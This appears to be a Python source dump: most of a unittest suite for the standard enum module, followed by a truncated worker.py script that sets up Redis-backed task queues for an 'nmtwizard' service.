def test_boundary(self): self.assertIs(enum.IntFlag._boundary_, EJECT) class Iron(IntFlag, boundary=STRICT): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Iron._boundary_, STRICT) # class Water(IntFlag, boundary=CONFORM): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Water._boundary_, CONFORM) # class Space(IntFlag, boundary=EJECT): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Space._boundary_, EJECT) # # class Bizarre(IntFlag, boundary=KEEP): b = 3 c = 4 d = 6 # self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5) # self.assertIs(Water(7), Water.ONE|Water.TWO) self.assertIs(Water(~9), Water.TWO) # self.assertEqual(Space(7), 7) self.assertTrue(type(Space(7)) is int) # self.assertEqual(list(Bizarre), [Bizarre.c]) self.assertIs(Bizarre(3), Bizarre.b) self.assertIs(Bizarre(6), Bizarre.d) def test_iter(self): Color = self.Color Open = self.Open self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE]) self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE]) def test_programatic_function_string(self): Perm = IntFlag('Perm', 'R W X') lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_with_start(self): Perm = IntFlag('Perm', 'R W X', start=8) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 8<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_list(self): Perm = IntFlag('Perm', ['R', 'W', 'X']) lst = list(Perm) 
self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_iterable(self): Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<(2*i+1) e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_dict(self): Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32)))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<(2*i+1) e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_empty_list(self): Perm = enum.IntFlag('Perm', []) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 0, Perm) Thing = enum.Enum('Thing', []) lst = list(Thing) self.assertEqual(len(lst), len(Thing)) self.assertEqual(len(Thing), 0, Thing) def test_programatic_function_from_empty_tuple(self): Perm = enum.IntFlag('Perm', ()) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 0, Perm) Thing = enum.Enum('Thing', ()) self.assertEqual(len(lst), len(Thing)) self.assertEqual(len(Thing), 0, Thing) @unittest.skipIf( python_version >= (3, 12), '__contains__ now returns True/False for 
all inputs', ) def test_contains_er(self): Open = self.Open Color = self.Color self.assertTrue(Color.GREEN in Color) self.assertTrue(Open.RW in Open) self.assertFalse(Color.GREEN in Open) self.assertFalse(Open.RW in Color) with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'GREEN' in Color with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'RW' in Open with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 2 in Color with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 2 in Open @unittest.skipIf( python_version < (3, 12), '__contains__ only works with enum memmbers before 3.12', ) def test_contains_tf(self): Open = self.Open Color = self.Color self.assertTrue(Color.GREEN in Color) self.assertTrue(Open.RW in Open) self.assertTrue(Color.GREEN in Open) self.assertTrue(Open.RW in Color) self.assertFalse('GREEN' in Color) self.assertFalse('RW' in Open) self.assertTrue(2 in Color) self.assertTrue(2 in Open) def test_member_contains(self): Perm = self.Perm R, W, X = Perm RW = R | W RX = R | X WX = W | X RWX = R | W | X self.assertTrue(R in RW) self.assertTrue(R in RX) self.assertTrue(R in RWX) self.assertTrue(W in RW) self.assertTrue(W in WX) self.assertTrue(W in RWX) self.assertTrue(X in RX) self.assertTrue(X in WX) self.assertTrue(X in RWX) self.assertFalse(R in WX) self.assertFalse(W in RX) self.assertFalse(X in RW) with self.assertRaises(TypeError): self.assertFalse('test' in RW) def test_member_iter(self): Color = self.Color self.assertEqual(list(Color.BLACK), []) self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE]) self.assertEqual(list(Color.BLUE), [Color.BLUE]) self.assertEqual(list(Color.GREEN), [Color.GREEN]) self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE]) def test_member_length(self): self.assertEqual(self.Color.__len__(self.Color.BLACK), 0) self.assertEqual(self.Color.__len__(self.Color.GREEN), 1) 
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2) self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3) def test_aliases(self): Color = self.Color self.assertEqual(Color(1).name, 'RED') self.assertEqual(Color['ROJO'].name, 'RED') self.assertEqual(Color(7).name, 'WHITE') self.assertEqual(Color['BLANCO'].name, 'WHITE') self.assertIs(Color.BLANCO, Color.WHITE) Open = self.Open self.assertIs(Open['AC'], Open.AC) def test_bool(self): Perm = self.Perm for f in Perm: self.assertTrue(f) Open = self.Open for f in Open: self.assertEqual(bool(f.value), bool(f)) def test_multiple_mixin(self): class AllMixin: @classproperty def ALL(cls): members = list(cls) all_value = None if members: all_value = members[0] for member in members[1:]: all_value |= member cls.ALL = all_value return all_value class StrMixin: def __str__(self): return self._name_.lower() class Color(AllMixin, IntFlag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'BLUE') class Color(AllMixin, StrMixin, IntFlag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') class Color(StrMixin, AllMixin, IntFlag): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 4) self.assertEqual(Color.ALL.value, 7) self.assertEqual(str(Color.BLUE), 'blue') @threading_helper.reap_threads def test_unique_composite(self): # override __eq__ to be identity only class TestFlag(IntFlag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return 
hash(self._value_) # have multiple threads competing to complete the composite members seen = set() failed = False def cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [ threading.Thread(target=cycle_enum) for _ in range(8) ] with threading_helper.start_threads(threads): pass # check that only 248 members were created self.assertFalse( failed, 'at least one thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') def test_default_missing(self): with self.assertRaisesRegex( ValueError, "'RED' is not a valid TestIntFlag.Color", ) as ctx: self.Color('RED') self.assertIs(ctx.exception.__context__, None) P = IntFlag('P', 'X Y') with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx: P('X') self.assertIs(ctx.exception.__context__, None) class TestEmptyAndNonLatinStrings(unittest.TestCase): def test_empty_string(self): with self.assertRaises(ValueError): empty_abc = Enum('empty_abc', ('', 'B', 'C')) def test_non_latin_character_string(self): greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C')) item = getattr(greek_abc, '\u03B1') self.assertEqual(item.value, 1) def test_non_latin_number_string(self): hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3')) item = getattr(hebrew_123, '\u05D0') self.assertEqual(item.value, 1) class TestUnique(unittest.TestCase): def test_unique_clean(self): @unique class Clean(Enum): one = 1 two = 'dos' tres = 4.0 # @unique class Cleaner(IntEnum): single = 1 double = 2 triple = 3 def test_unique_dirty(self): with self.assertRaisesRegex(ValueError, 'tres.*one'): @unique class Dirty(Enum): one = 1 two = 'dos' tres = 1 with self.assertRaisesRegex( ValueError, 'double.*single.*turkey.*triple', ): @unique class Dirtier(IntEnum): single = 1 double = 1 triple = 3 turkey = 3 def test_unique_with_name(self): @verify(UNIQUE) class Silly(Enum): one = 1 two = 'dos' name = 3 # @verify(UNIQUE) class 
Sillier(IntEnum): single = 1 name = 2 triple = 3 value = 4 class TestVerify(unittest.TestCase): def test_continuous(self): @verify(CONTINUOUS) class Auto(Enum): FIRST = auto() SECOND = auto() THIRD = auto() FORTH = auto() # @verify(CONTINUOUS) class Manual(Enum): FIRST = 3 SECOND = 4 THIRD = 5 FORTH = 6 # with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'): @verify(CONTINUOUS) class Missing(Enum): FIRST = 3 SECOND = 4 THIRD = 11 FORTH = 13 # with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'): @verify(CONTINUOUS) class Incomplete(Flag): FIRST = 4 SECOND = 8 THIRD = 16 FORTH = 64 # with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'): @verify(CONTINUOUS) class StillIncomplete(Flag): FIRST = 4 SECOND = 8 THIRD = 11 FORTH = 32 def test_composite(self): class Bizarre(Flag): b = 3 c = 4 d = 6 self.assertEqual(list(Bizarre), [Bizarre.c]) self.assertEqual(Bizarre.b.value, 3) self.assertEqual(Bizarre.c.value, 4) self.assertEqual(Bizarre.d.value, 6) with self.assertRaisesRegex( ValueError, "invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.", ): @verify(NAMED_FLAGS) class Bizarre(Flag): b = 3 c = 4 d = 6 # self.assertEqual(enum.show_flag_values(3), [1, 2]) class Bizarre(IntFlag): b = 3 c = 4 d = 6 self.assertEqual(list(Bizarre), [Bizarre.c]) self.assertEqual(Bizarre.b.value, 3) self.assertEqual(Bizarre.c.value, 4) self.assertEqual(Bizarre.d.value, 6) with self.assertRaisesRegex( ValueError, "invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. 
for details.", ): @verify(NAMED_FLAGS) class Bizarre(IntFlag): c = 4 d = 6 self.assertEqual(enum.show_flag_values(2), [2]) def test_unique_clean(self): @verify(UNIQUE) class Clean(Enum): one = 1 two = 'dos' tres = 4.0 # @verify(UNIQUE) class Cleaner(IntEnum): single = 1 double = 2 triple = 3 def test_unique_dirty(self): with self.assertRaisesRegex(ValueError, 'tres.*one'): @verify(UNIQUE) class Dirty(Enum): one = 1 two = 'dos' tres = 1 with self.assertRaisesRegex( ValueError, 'double.*single.*turkey.*triple', ): @verify(UNIQUE) class Dirtier(IntEnum): single = 1 double = 1 triple = 3 turkey = 3 def test_unique_with_name(self): @verify(UNIQUE) class Silly(Enum): one = 1 two = 'dos' name = 3 # @verify(UNIQUE) class Sillier(IntEnum): single = 1 name = 2 triple = 3 value = 4 class TestHelpers(unittest.TestCase): sunder_names = '_bad_', '_good_', '_what_ho_' dunder_names = '__mal__', '__bien__', '__que_que__' private_names = '_MyEnum__private', '_MyEnum__still_private' private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_' random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__' def test_sunder(self): for name in self.sunder_names + self.private_and_sunder_names: self.assertTrue(enum._is_sunder(name), '%r is a not sunder name?' % name) for name in self.dunder_names + self.private_names + self.random_names: self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name) def test_dunder(self): for name in self.dunder_names: self.assertTrue(enum._is_dunder(name), '%r is a not dunder name?' % name) for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names: self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' 
                % name)

    def test_is_private(self):
        # _is_private() should be True only for single-underscore names
        # (not sunder/dunder/plain names).
        # NOTE(review): the failure messages below contain '%r' but no '%'
        # formatting is applied, so the member name is never interpolated.
        for name in self.private_names + self.private_and_sunder_names:
            self.assertTrue(enum._is_private('MyEnum', name), '%r is a not private name?')
        for name in self.sunder_names + self.dunder_names + self.random_names:
            self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?')


class TestEnumTypeSubclassing(unittest.TestCase):
    # Placeholder for EnumType-subclassing tests.
    pass


# Expected pydoc output for the Color enum below.  The '\x20' escapes encode
# trailing spaces that pydoc emits and that editors would otherwise strip;
# they are part of the expected text and must not be "cleaned up".
expected_help_output_with_docs = """\
Help on class Color in module %s:

class Color(enum.Enum)
 |  Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
 |\x20\x20
 |  An enumeration.
 |\x20\x20
 |  Method resolution order:
 |      Color
 |      enum.Enum
 |      builtins.object
 |\x20\x20
 |  Data and other attributes defined here:
 |\x20\x20
 |  blue = Color.blue
 |\x20\x20
 |  green = Color.green
 |\x20\x20
 |  red = Color.red
 |\x20\x20
 |  ----------------------------------------------------------------------
 |  Data descriptors inherited from enum.Enum:
 |\x20\x20
 |  name
 |      The name of the Enum member.
 |\x20\x20
 |  value
 |      The value of the Enum member.
 |\x20\x20
 |  ----------------------------------------------------------------------
 |  Readonly properties inherited from enum.EnumType:
 |\x20\x20
 |  __members__
 |      Returns a mapping of member name->value.
 |\x20\x20\x20\x20\x20\x20
 |      This mapping lists all enum members, including aliases. Note that this
 |      is a read-only view of the internal mapping."""

# Variant used when the interpreter was built without docstrings (-OO).
expected_help_output_without_docs = """\
Help on class Color in module %s:

class Color(enum.Enum)
 |  Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
 |\x20\x20
 |  Method resolution order:
 |      Color
 |      enum.Enum
 |      builtins.object
 |\x20\x20
 |  Data and other attributes defined here:
 |\x20\x20
 |  blue = Color.blue
 |\x20\x20
 |  green = Color.green
 |\x20\x20
 |  red = Color.red
 |\x20\x20
 |  ----------------------------------------------------------------------
 |  Data descriptors inherited from enum.Enum:
 |\x20\x20
 |  name
 |\x20\x20
 |  value
 |\x20\x20
 |  ----------------------------------------------------------------------
 |  Data descriptors inherited from enum.EnumType:
 |\x20\x20
 |  __members__"""


class TestStdLib(unittest.TestCase):
    # Verify that enums cooperate with stdlib introspection tools
    # (pydoc and inspect), which exercise __objclass__ indirectly.

    maxDiff = None

    class Color(Enum):
        red = 1
        green = 2
        blue = 3

    def test_pydoc(self):
        # indirectly test __objclass__
        if StrEnum.__doc__ is None:
            expected_text = expected_help_output_without_docs % __name__
        else:
            expected_text = expected_help_output_with_docs % __name__
        output = StringIO()
        helper = pydoc.Helper(output=output)
        helper(self.Color)
        result = output.getvalue().strip()
        self.assertEqual(result, expected_text)

    def test_inspect_getmembers(self):
        values = dict((
                ('__class__', EnumType),
                ('__doc__', 'An enumeration.'),
                ('__members__', self.Color.__members__),
                ('__module__', __name__),
                ('blue', self.Color.blue),
                ('green', self.Color.green),
                ('name', Enum.__dict__['name']),
                ('red', self.Color.red),
                ('value', Enum.__dict__['value']),
                ))
        result = dict(inspect.getmembers(self.Color))
        self.assertEqual(set(values.keys()), set(result.keys()))
        failed = False
        # Compare member-by-member so every mismatch is printed before failing.
        for k in values.keys():
            if result[k] != values[k]:
                print()
                print('\n%s\n     key: %s\n  result: %s\nexpected: %s\n%s\n' %
                        ('=' * 75, k, result[k], values[k], '=' * 75), sep='')
                failed = True
        if failed:
            self.fail("result does not equal expected, see print above")

    def test_inspect_classify_class_attrs(self):
        # indirectly test __objclass__
        from inspect import Attribute
        values = [
                Attribute(name='__class__', kind='data',
                    defining_class=object, object=EnumType),
                Attribute(name='__doc__', kind='data',
                    defining_class=self.Color, object='An enumeration.'),
                Attribute(name='__members__', kind='property',
                    defining_class=EnumType, object=EnumType.__members__),
                Attribute(name='__module__', kind='data',
                    defining_class=self.Color, object=__name__),
                Attribute(name='blue', kind='data',
                    defining_class=self.Color, object=self.Color.blue),
                Attribute(name='green', kind='data',
                    defining_class=self.Color, object=self.Color.green),
                Attribute(name='red', kind='data',
                    defining_class=self.Color, object=self.Color.red),
                Attribute(name='name', kind='data',
                    defining_class=Enum, object=Enum.__dict__['name']),
                Attribute(name='value', kind='data',
                    defining_class=Enum, object=Enum.__dict__['value']),
                ]
        values.sort(key=lambda item: item.name)
        result = list(inspect.classify_class_attrs(self.Color))
        result.sort(key=lambda item: item.name)
        self.assertEqual(
                len(values), len(result),
                "%s != %s" % ([a.name for a in values], [a.name for a in result])
                )
        failed = False
        for v, r in zip(values, result):
            if r != v:
                print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
                failed = True
        if failed:
            self.fail("result does not equal expected, see print above")

    def test_test_simple_enum(self):
        # _test_simple_enum() must accept a @_simple_enum class that matches
        # its hand-written counterpart, and reject one whose values diverge.
        @_simple_enum(Enum)
        class SimpleColor:
            RED = 1
            GREEN = 2
            BLUE = 3
        class CheckedColor(Enum):
            RED = 1
            GREEN = 2
            BLUE = 3
        self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None)
        SimpleColor.GREEN._value_ = 9
        self.assertRaisesRegex(
                TypeError, "enum mismatch",
                _test_simple_enum, CheckedColor, SimpleColor,
                )
        # ALL includes bit 12's low bits not covered by any member; with
        # boundary=KEEP the extra bits are kept and ALL stays out of iteration.
        class CheckedMissing(IntFlag, boundary=KEEP):
            SIXTY_FOUR = 64
            ONE_TWENTY_EIGHT = 128
            TWENTY_FORTY_EIGHT = 2048
            ALL = 2048 + 128 + 64 + 12
        CM = CheckedMissing
        self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT])
        #
        @_simple_enum(IntFlag, boundary=KEEP)
        class Missing:
            SIXTY_FOUR = 64
            ONE_TWENTY_EIGHT = 128
            TWENTY_FORTY_EIGHT = 2048
            ALL = 2048 + 128 + 64 + 12
        M = Missing
        self.assertEqual(list(CheckedMissing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT])
        #
        _test_simple_enum(CheckedMissing, Missing)


class MiscTestCase(unittest.TestCase):
    def test__all__(self):
        support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'})


# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5  # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5

CONVERT_STRING_TEST_NAME_D = 5
CONVERT_STRING_TEST_NAME_C = 5
CONVERT_STRING_TEST_NAME_B = 5
CONVERT_STRING_TEST_NAME_A = 5  # This one should sort first.
CONVERT_STRING_TEST_NAME_E = 5
CONVERT_STRING_TEST_NAME_F = 5

# We also need values that cannot be compared:
UNCOMPARABLE_A = 5
UNCOMPARABLE_C = (9, 1)  # naming order is broken on purpose
UNCOMPARABLE_B = 'value'

COMPLEX_C = 1j
COMPLEX_A = 2j
COMPLEX_B = 3j


class TestIntEnumConvert(unittest.TestCase):
    # Tests for IntEnum._convert_, which builds an enum from module globals.
    # MODULE / SHORT_MODULE are defined earlier in the file.
    def setUp(self):
        # Reset the module-level test variables to their original integer
        # values, otherwise the already created enum values get converted
        # instead.
        for suffix in ['A', 'B', 'C', 'D', 'E', 'F']:
            globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5
            globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5

    def test_convert_value_lookup_priority(self):
        test_type = enum.IntEnum._convert_(
                'UnittestConvert',
                MODULE,
                filter=lambda x: x.startswith('CONVERT_TEST_'))
        # We don't want the reverse lookup value to vary when there are
        # multiple possible names for a given value.  It should always
        # report the first lexigraphical name in that case.
        self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')

    def test_convert(self):
        test_type = enum.IntEnum._convert_(
                'UnittestConvert',
                MODULE,
                filter=lambda x: x.startswith('CONVERT_TEST_'))
        # Ensure that test_type has all of the desired names and values.
        self.assertEqual(test_type.CONVERT_TEST_NAME_F,
                         test_type.CONVERT_TEST_NAME_A)
        self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
        self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
        self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
        self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
        # Ensure that test_type only picked up names matching the filter.
        self.assertEqual([name for name in dir(test_type)
                          if name[0:2] not in ('CO', '__')
                          and name not in dir(IntEnum)],
                         [], msg='Names other than CONVERT_TEST_* found.')

    def test_convert_uncomparable(self):
        uncomp = enum.Enum._convert_(
                'Uncomparable',
                MODULE,
                filter=lambda x: x.startswith('UNCOMPARABLE_'),
                )
        # Should be ordered by `name` only:
        self.assertEqual(
                list(uncomp),
                [uncomp.UNCOMPARABLE_A, uncomp.UNCOMPARABLE_B, uncomp.UNCOMPARABLE_C],
                )

    def test_convert_complex(self):
        uncomp = enum.Enum._convert_(
                'Uncomparable',
                MODULE,
                filter=lambda x: x.startswith('COMPLEX_'),
                )
        # Should be ordered by `name` only:
        self.assertEqual(
                list(uncomp),
                [uncomp.COMPLEX_A, uncomp.COMPLEX_B, uncomp.COMPLEX_C],
                )

    @unittest.skipUnless(python_version == (3, 8),
                         '_convert was deprecated in 3.8')
    def test_convert_warn(self):
        with self.assertWarns(DeprecationWarning):
            enum.IntEnum._convert(
                'UnittestConvert',
                MODULE,
                filter=lambda x: x.startswith('CONVERT_TEST_'))

    @unittest.skipUnless(python_version >= (3, 9),
                         '_convert was removed in 3.9')
    def test_convert_raise(self):
        with self.assertRaises(AttributeError):
            enum.IntEnum._convert(
                'UnittestConvert',
                MODULE,
                filter=lambda x: x.startswith('CONVERT_TEST_'))

    def test_convert_repr_and_str(self):
        test_type = enum.IntEnum._convert_(
                'UnittestConvert',
                MODULE,
                filter=lambda x: x.startswith('CONVERT_STRING_TEST_'))
        self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A),
                         '%s.CONVERT_STRING_TEST_NAME_A' % SHORT_MODULE)
        self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A),
                         'CONVERT_STRING_TEST_NAME_A')
        self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5')


# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'


class TestStrEnumConvert(unittest.TestCase):
    # Same as TestIntEnumConvert, but for StrEnum._convert_.
    def setUp(self):
        global CONVERT_STR_TEST_1
        global CONVERT_STR_TEST_2
        CONVERT_STR_TEST_2 = 'goodbye'
        CONVERT_STR_TEST_1 = 'hello'

    def test_convert(self):
        test_type = enum.StrEnum._convert_(
                'UnittestConvert',
                MODULE,
                filter=lambda x: x.startswith('CONVERT_STR_'))
        # Ensure that test_type has all of the desired names and values.
        self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
        self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
        # Ensure that test_type only picked up names matching the filter.
        self.assertEqual([name for name in dir(test_type)
                          if name[0:2] not in ('CO', '__')
                          and name not in dir(StrEnum)],
                         [], msg='Names other than CONVERT_STR_* found.')

    def test_convert_repr_and_str(self):
        test_type = enum.StrEnum._convert_(
                'UnittestConvert',
                MODULE,
                filter=lambda x: x.startswith('CONVERT_STR_'))
        self.assertEqual(repr(test_type.CONVERT_STR_TEST_1),
                         '%s.CONVERT_STR_TEST_1' % SHORT_MODULE)
        self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
        self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')


if __name__ == '__main__':
    unittest.main()
# ===== file: worker.py =====
"""Entry point for a per-service worker: registers itself in Redis, repairs
stale task/resource state, then supervises Worker and WorkerButler processes.

Module level code runs at import time (argparse, DB connections, signal
handlers), so this file must only ever be executed as a script.
"""
import logging.config
import time
import os
import sys
import argparse
import signal
from multiprocessing import Process

import six

from nmtwizard import configuration as config, task, workeradmin
from nmtwizard.worker import Worker
from nmtwizard.worker_butler import WorkerButler
from utils.database_utils import DatabaseUtils

parser = argparse.ArgumentParser()
parser.add_argument('service_name', type=str, help="Name of service")
args = parser.parse_args()
service_name = args.service_name
assert service_name, "Name of service mustn't None"


def get_logger(logger_config):
    """Configure logging from the settings dict and return the 'worker' logger."""
    # dictConfig requires a schema version; force it rather than trusting input.
    logger_config["version"] = 1
    logging.config.dictConfig(logger_config)
    return logging.getLogger("worker")


system_config = config.get_system_config()
mongo_client = DatabaseUtils.get_mongo_client(system_config)
redis_db = DatabaseUtils.get_redis_client(system_config)
base_config = config.process_base_config(mongo_client)
service_config = config.get_service_config(mongo_client, service_name)

assert "default" in system_config, "Can't read default config from settings.yaml"
system_config_default = system_config["default"]
assert 'logging' in system_config, "Can't read logging config from settings.yaml"
logger = get_logger(system_config["logging"])

# Defaults; each may be overridden under the service's "worker" section.
process_count = 1
worker_cycle = 0.05
worker_butler_cycle = 0.5
if "worker" in service_config and "process_count" in service_config["worker"]:
    process_count_config = service_config["worker"]["process_count"]
    assert isinstance(process_count_config, int), "number_of_workers config must be integer"
    process_count = process_count_config
if "worker" in service_config and "worker_cycle" in service_config["worker"]:
    worker_cycle_config = service_config["worker"]["worker_cycle"]
    # NOTE(review): isinstance(..., float) rejects integer YAML values such as
    # `worker_cycle: 1` even though the message says "numeric" — confirm intent.
    assert isinstance(worker_cycle_config, float) and worker_cycle_config > 0, "worker/worker_cycle must be numeric and greater than 0"
    worker_cycle = worker_cycle_config
if "worker" in service_config and "worker_butler_cycle" in service_config["worker"]:
    worker_butler_cycle_config = service_config["worker"]["worker_butler_cycle"]
    assert isinstance(worker_butler_cycle_config, float) and worker_butler_cycle_config > 0, "worker/worker_butler_cycle must be numeric and greater than 0"
    worker_butler_cycle = worker_butler_cycle_config

retry = 0
while retry < 10:
    try:
        # make sure notify events are set
        redis_db.config_set('notify-keyspace-events', 'Klgx')
        break
    except ConnectionError as e:
        # NOTE(review): this catches the *builtin* ConnectionError; it assumes
        # the redis client raises a subclass of it — verify against the
        # installed redis-py version.
        retry += 1
        logger.warning("cannot connect to redis DB - retrying (%d)", retry)
        time.sleep(1)

# retry == 10 means the loop above never reached `break`.
assert retry < 10, "Cannot connect to redis DB - aborting"

services, merged_config = config.load_service_config(service_config, base_config)
assert len(services) == 1, "workers are now dedicated to one single service"
service = next(iter(services))

pid = os.getpid()
logger.info('Running worker for %s - PID = %d' % (service, pid))

# Heart-beat hash for this worker instance; expires unless refreshed below.
instance_id = 'admin:worker:%s:%d' % (service, pid)
redis_db.hset(instance_id, "launch_time", time.time())
redis_db.hset(instance_id, "beat_time", time.time())
redis_db.expire(instance_id, 600)

keys = 'admin:services'
redis_db.sadd(keys, service)


def graceful_exit(signum, frame):
    """Signal handler: drop our heart-beat key and exit cleanly."""
    logger.info('received interrupt - stopping')
    redis_db.delete(instance_id)
    sys.exit(0)


signal.signal(signal.SIGTERM, graceful_exit)
signal.signal(signal.SIGINT, graceful_exit)


# define ttl policy for a task
def ttl_policy(task_map):
    """Return the TTL for a task, taken from the first service ttl_policy rule
    whose pattern fields all match the task; 0 when no rule matches."""
    s = task_map['service']
    if s is not None and s in services and 'ttl_policy' in services[s]._config:
        for ttl_rule in services[s]._config['ttl_policy']:
            match = True
            for p, v in six.iteritems(ttl_rule['pattern']):
                match = p in task_map and task_map[p] == v
                if not match:
                    break
            if match:
                return ttl_rule['ttl']
    return 0


def reorganize_data():
    """Repair Redis state on (re)start: queues, task records, resources."""
    logger.debug(f"[{service}-{pid}]: Reorganizing data")
    remove_queued_tasks()
    reorganize_tasks()
    reorganize_resources()


def remove_queued_tasks():
    """Drop every 'queued:<service>' key so queues are rebuilt from scratch."""
    logger.debug(f"[{service}-{pid}]: Removing queued tasks")
    for key in redis_db.keys('queued:%s' % service):
        redis_db.delete(key)


def reorganize_tasks():
    logger.debug(f"[{service}-{pid}]: Reorganizing tasks")
    # On startup, add all active tasks in the work queue or service queue
    for task_id in task.list_active(redis_db, service):
        task_key = f'task:{task_id}'
        with redis_db.acquire_lock(task_id):
            status = redis_db.hget(task_key, 'status')
            if status in ['queued', 'allocated']:
                task.service_queue(redis_db, task_id, service)
                task.set_status(redis_db, 'task:' + task_id, 'queued')
            else:
